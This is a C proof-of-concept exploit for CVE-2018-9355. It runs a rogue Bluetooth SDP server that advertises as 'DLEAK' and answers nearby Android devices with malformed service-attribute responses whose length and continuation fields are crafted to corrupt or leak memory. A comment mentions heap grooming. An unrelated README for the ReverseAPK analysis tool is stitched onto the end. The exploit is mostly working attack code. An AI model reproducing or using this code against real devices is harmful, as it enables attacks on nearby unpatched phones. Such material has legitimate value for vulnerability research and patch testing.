 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 *
 */

/** CVE-2018-9355
 *  https://source.android.com/security/bulletin/2018-06-01
 */

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <arpa/inet.h>

#include <bluetooth/bluetooth.h>
#include <bluetooth/sdp.h>
#include <bluetooth/l2cap.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>


#define EIR_FLAGS                   0x01  /* flags */
#define EIR_NAME_COMPLETE           0x09  /* complete local name */
#define EIR_LIM_DISC                0x01 /* LE Limited Discoverable Mode */
#define EIR_GEN_DISC                0x02 /* LE General Discoverable Mode */

#define DATA_ELE_SEQ_DESC_TYPE 6
#define UINT_DESC_TYPE 1


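/* SDP data element size-index values (per the SDP spec): 0 = 1 byte, 1 = 2 bytes,
 * 2 = 4 bytes, 3 = 8 bytes, 4 = 16 bytes, 6 = length held in the next 16-bit word. */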
#define SIZE_SIXTEEN_BYTES 4
#define SIZE_EIGHT_BYTES 3
#define SIZE_FOUR_BYTES 2
#define SIZE_TWO_BYTES 1
#define SIZE_ONE_BYTE 0
#define SIZE_IN_NEXT_WORD 6
#define TWO_COMP_INT_DESC_TYPE 2
#define UUID_DESC_TYPE 3
#define ATTR_ID_SERVICE_ID 0x0003

static int count = 0;
static int do_continuation;

static int init_server(uint16_t mtu)
{
	struct l2cap_options opts;
	struct sockaddr_l2 l2addr;
	socklen_t optlen;
	int l2cap_sock;

	/* Create L2CAP socket */
	l2cap_sock = socket(PF_BLUETOOTH, SOCK_SEQPACKET, BTPROTO_L2CAP);
	if (l2cap_sock < 0) {
		printf("opening L2CAP socket: %s", strerror(errno));
		return -1;
	}

	memset(&l2addr, 0, sizeof(l2addr));
	l2addr.l2_family = AF_BLUETOOTH;
	bacpy(&l2addr.l2_bdaddr, BDADDR_ANY);
	l2addr.l2_psm = htobs(SDP_PSM);

	if (bind(l2cap_sock, (struct sockaddr *) &l2addr, sizeof(l2addr)) < 0) {
		printf("binding L2CAP socket: %s", strerror(errno));
		return -1;
	}

	int opt = L2CAP_LM_MASTER;
	if (setsockopt(l2cap_sock, SOL_L2CAP, L2CAP_LM, &opt, sizeof(opt)) < 0) {
		printf("setsockopt: %s", strerror(errno));
		return -1;
	}

	memset(&opts, 0, sizeof(opts));
	optlen = sizeof(opts);

	if (getsockopt(l2cap_sock, SOL_L2CAP, L2CAP_OPTIONS, &opts, &optlen) < 0) {
		printf("getsockopt: %s", strerror(errno));
		return -1;
	}
	opts.omtu = mtu;
	opts.imtu = mtu;

	if (setsockopt(l2cap_sock, SOL_L2CAP, L2CAP_OPTIONS, &opts, sizeof(opts)) < 0) {
		printf("setsockopt: %s", strerror(errno));
		return -1;
	}

	if (listen(l2cap_sock, 5) < 0) {
	  printf("listen: %s", strerror(errno));
	  return -1;
	}

	return l2cap_sock;
}

static int process_service_search_req(uint8_t *pkt)
{
	uint8_t *start = pkt;
	uint8_t *lenloc = pkt;


	/* Total Handles */
	bt_put_be16(400, pkt); pkt += 2;
	bt_put_be16(400, pkt); pkt += 2;

	/* and that's it! */
	/* TODO: Can we do some heap grooming to make sure we don't get a continuation? */

	//bt_put_be16((pkt - start) - 2, lenloc);
	return pkt - start;
}

static uint8_t *place_uid(uint8_t *pkt, int o)
{
	int i;
	for (i = 0; i < 16; i++)
		*pkt++ = 0x16 + (i + o);
	return pkt;

}

static size_t flood_u128s(uint8_t *pkt)
{
	int i;
	uint8_t *start = pkt;
	uint8_t *lenloc = pkt;
	size_t retsize = 0;

	bt_put_be16(9, pkt);pkt += 2;

	if (do_continuation == 1) {
		*pkt = DATA_ELE_SEQ_DESC_TYPE << 3;
		*pkt |= SIZE_IN_NEXT_WORD;
		pkt++;
		start = pkt;
		pkt += 2;
	}

	//*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	//pkt++;

	for (i = 0; i < 31; i++) {
		*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
		pkt++;

		*pkt = (UINT_DESC_TYPE << 3) | SIZE_TWO_BYTES;
		pkt++;
		/* Attr ID */
		bt_put_be16(ATTR_ID_SERVICE_ID, pkt); pkt += 2;

		*pkt = (UUID_DESC_TYPE << 3) | SIZE_SIXTEEN_BYTES;
		pkt++;
		pkt = place_uid(pkt, i);
	}
	/* Set the continuation */
	if (do_continuation) {
		bt_put_be16(654, lenloc);
		bt_put_be16(651 * 2, start);
		*pkt = 1;
		retsize = 658;
	}
	else {
		bt_put_be16(651, lenloc);
		//bt_put_be16(648, start);
		*pkt = 0;
		retsize = 654;
	}
	//	bt_put_be16((pkt - lenloc) + 10, lenloc);
	//	bt_put_be16((pkt - start) + 10, start);
	printf("%s: size is pkt - lenloc %zu and pkt is 0x%02x\n", __func__, pkt - lenloc, *pkt);
	pkt++;

	return retsize;

}

static size_t do_fake_svcsar(uint8_t *pkt)
{

	int i;
	uint8_t *start = pkt;
	uint8_t *lenloc = pkt;
	/* Id and length -- ignored in the code */
	//bt_put_be16(0, pkt);pkt += 2;
	//bt_put_be16(0xABCD, pkt);pkt += 2;
	/* list byte count */
	bt_put_be16(9, pkt);pkt += 2;

	*pkt = DATA_ELE_SEQ_DESC_TYPE << 3;
	*pkt |= SIZE_EIGHT_BYTES;
	pkt++;

	*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	pkt++;

	*pkt = (UINT_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	pkt++;
	/* Attr ID */
	bt_put_be16(0x0100, pkt); pkt += 2;

	*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	pkt++;

	*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	pkt++;

	/* Set the continuation */
	if (do_continuation)
		*pkt = 1;
	else
		*pkt = 1;
	pkt++;

	/* Place the size... */
	//bt_put_be16((pkt - start) - 2, lenloc);

	printf("%zu\n", pkt-start);
	return (size_t) (pkt - start);
}

static void process_request(uint8_t *buf, int fd)
{
	sdp_pdu_hdr_t *reqhdr = (sdp_pdu_hdr_t *) buf;
	sdp_pdu_hdr_t *rsphdr;
	uint8_t *rsp = malloc(65535);
	int status = SDP_INVALID_SYNTAX;
	int send_size = 0;

	memset(rsp, 0, 65535);
	rsphdr = (sdp_pdu_hdr_t *)rsp;
	rsphdr->tid = reqhdr->tid;

	switch (reqhdr->pdu_id) {
	case SDP_SVC_SEARCH_REQ:
		printf("Got a svc srch req\n");
		send_size = process_service_search_req(rsp + sizeof(sdp_pdu_hdr_t));
		rsphdr->pdu_id = SDP_SVC_SEARCH_RSP;
		rsphdr->plen = htons(send_size);
		break;
	case SDP_SVC_ATTR_REQ:
		printf("Got a svc attr req\n");
		//status = service_attr_req(req, &rsp);
		rsphdr->pdu_id = SDP_SVC_ATTR_RSP;
		break;
	case SDP_SVC_SEARCH_ATTR_REQ:
		printf("Got a svc srch attr req\n");
		//status = service_search_attr_req(req, &rsp);
		rsphdr->pdu_id = SDP_SVC_SEARCH_ATTR_RSP;
		send_size = flood_u128s(rsp + sizeof(sdp_pdu_hdr_t));
		//do_fake_svcsar(rsp + sizeof(sdp_pdu_hdr_t)) + 3;
		rsphdr->plen = htons(send_size);
		break;
	default:
		printf("Unknown PDU ID : 0x%x received", reqhdr->pdu_id);
		status = SDP_INVALID_SYNTAX;
		break;
	}
	printf("%s: sending %zu\n", __func__, send_size + sizeof(sdp_pdu_hdr_t));
	send(fd, rsp, send_size + sizeof(sdp_pdu_hdr_t), 0);
	free(rsp);
}


static void *l2cap_data_thread(void *input)
{
	int fd = *(int *)input;
	sdp_pdu_hdr_t hdr;
	uint8_t *buf;
	int len, size;

	while (true) {
		len = recv(fd, &hdr, sizeof(sdp_pdu_hdr_t), MSG_PEEK);
		if (len < 0 || (unsigned int) len < sizeof(sdp_pdu_hdr_t)) {
			continue;
		}

		size = sizeof(sdp_pdu_hdr_t) + ntohs(hdr.plen);
		buf = malloc(size);
		if (!buf)
			continue;

		printf("%s: trying to recv %d\n", __func__, size);
		len = recv(fd, buf, size, 0);
		if (len <= 0) {
			free(buf);
			continue;
		}

		if (!count) {
			process_request(buf, fd);
			count ++;
		}
		if (count >= 1) {
			do_continuation = 0;
			process_request(buf, fd);
			count++;
		}

		free(buf);
	}
}

/* derived from hciconfig.c */
static void *advertiser(void *unused)
{
	uint8_t status;
	int device_id, handle;
	struct hci_request req = { 0 };
	le_set_advertise_enable_cp acp = { 0 };
	le_set_advertising_parameters_cp avc = { 0 };
	le_set_advertising_data_cp data = { 0 };

	device_id = hci_get_route(NULL);

	if (device_id < 0) {
		printf("%s: Failed to get route: %s\n", __func__, strerror(errno));
		return NULL;
	}
	handle = hci_open_dev(hci_get_route(NULL));
	if (handle < 0) {
		printf("%s: Failed to open and aquire handle: %s\n", __func__, strerror(errno));
		return NULL;
	}

	avc.min_interval = avc.max_interval = htobs(150);
	avc.chan_map = 7;
	req.ogf = OGF_LE_CTL;
	req.ocf = OCF_LE_SET_ADVERTISING_PARAMETERS;
	req.cparam = &avc;
	req.clen = LE_SET_ADVERTISING_PARAMETERS_CP_SIZE;
	req.rparam = &status;
	req.rlen = 1;

	if (hci_send_req(handle, &req, 1000) < 0) {
		hci_close_dev(handle);
		printf("%s: Failed to send request %s\n", __func__, strerror(errno));
		return NULL;
	}
	memset(&req, 0, sizeof(req));
	req.ogf = OGF_LE_CTL;
	req.ocf = OCF_LE_SET_ADVERTISE_ENABLE;
	req.cparam = &acp;
	req.clen = LE_SET_ADVERTISE_ENABLE_CP_SIZE;
	req.rparam = &status;
	req.rlen = 1;

	data.data[0] = htobs(2);
	data.data[1] = htobs(EIR_FLAGS);
	data.data[2] = htobs(EIR_GEN_DISC | EIR_LIM_DISC);

	data.data[3] = htobs(6);
	data.data[4] = htobs(EIR_NAME_COMPLETE);
	data.data[5] = 'D';
	data.data[6] = 'L';
	data.data[7] = 'E';
	data.data[8] = 'A';
	data.data[9] = 'K';

	data.length = 10;

	memset(&req, 0, sizeof(req));
	req.ogf = OGF_LE_CTL;
	req.ocf = OCF_LE_SET_ADVERTISING_DATA;
	req.cparam = &data;
	req.clen = LE_SET_ADVERTISING_DATA_CP_SIZE;
	req.rparam = &status;
	req.rlen = 1;

	if (hci_send_req(handle, &req, 1000) < 0) {
		hci_close_dev(handle);
		printf("%s: Failed to send request %s\n", __func__, strerror(errno));
		return NULL;
	}
	printf("Device should be advertising under DLEAK\n");
}



int main(int argc, char **argv)
{
	pthread_t *io_channel;
	pthread_t adv;
	int       fds[16];
	const int io_chans = 16;
	struct sockaddr_l2 addr;
	socklen_t qlen = sizeof(addr);
	socklen_t len = sizeof(addr);
	int l2cap_sock;
	int i;


	pthread_create(&adv, NULL, advertiser, NULL);
	l2cap_sock = init_server(652);
	if (l2cap_sock < 0)
		return EXIT_FAILURE;

	io_channel = malloc(io_chans * sizeof(*io_channel));
	if (!io_channel)
		return EXIT_FAILURE;

	do_continuation = 1;
	for (i = 0; i < io_chans; i++) {
		printf("%s: Going to accept on io chan %d\n", __func__, i);
		fds[i] = accept(l2cap_sock, (struct sockaddr *) &addr, &len);
		if (fds[i] < 0) {
			i--;
			printf("%s: Accept failed with %s\n", __func__, strerror(errno));
			continue;
		}
		printf("%s: accepted\n", __func__);
		pthread_create(&io_channel[i], NULL, l2cap_data_thread, &fds[i]);
	}

	/* Keep the process alive: if main() returns, the worker threads are killed. */
	for (i = 0; i < io_chans; i++)
		pthread_join(io_channel[i], NULL);

	return EXIT_SUCCESS;
}

ReverseAPK — Quickly Analyze And Reverse Engineer Android Packages

Quickly analyze and reverse engineer Android applications.

FEATURES:

  • Displays all extracted files for easy reference
  • Automatically decompile APK files to Java and Smali format
  • Analyze AndroidManifest.xml for common vulnerabilities and behavior
  • Static source code analysis for common vulnerabilities and behavior
    • Device info
    • Intents
    • Command execution
    • SQLite references
    • Logging references
    • Content providers
    • Broadcast receivers
    • Service references
    • File references
    • Crypto references
    • Hardcoded secrets
    • URLs
    • Network connections
    • SSL references
    • WebView references

INSTALL:

./install

USAGE:

reverse-apk <apk_name>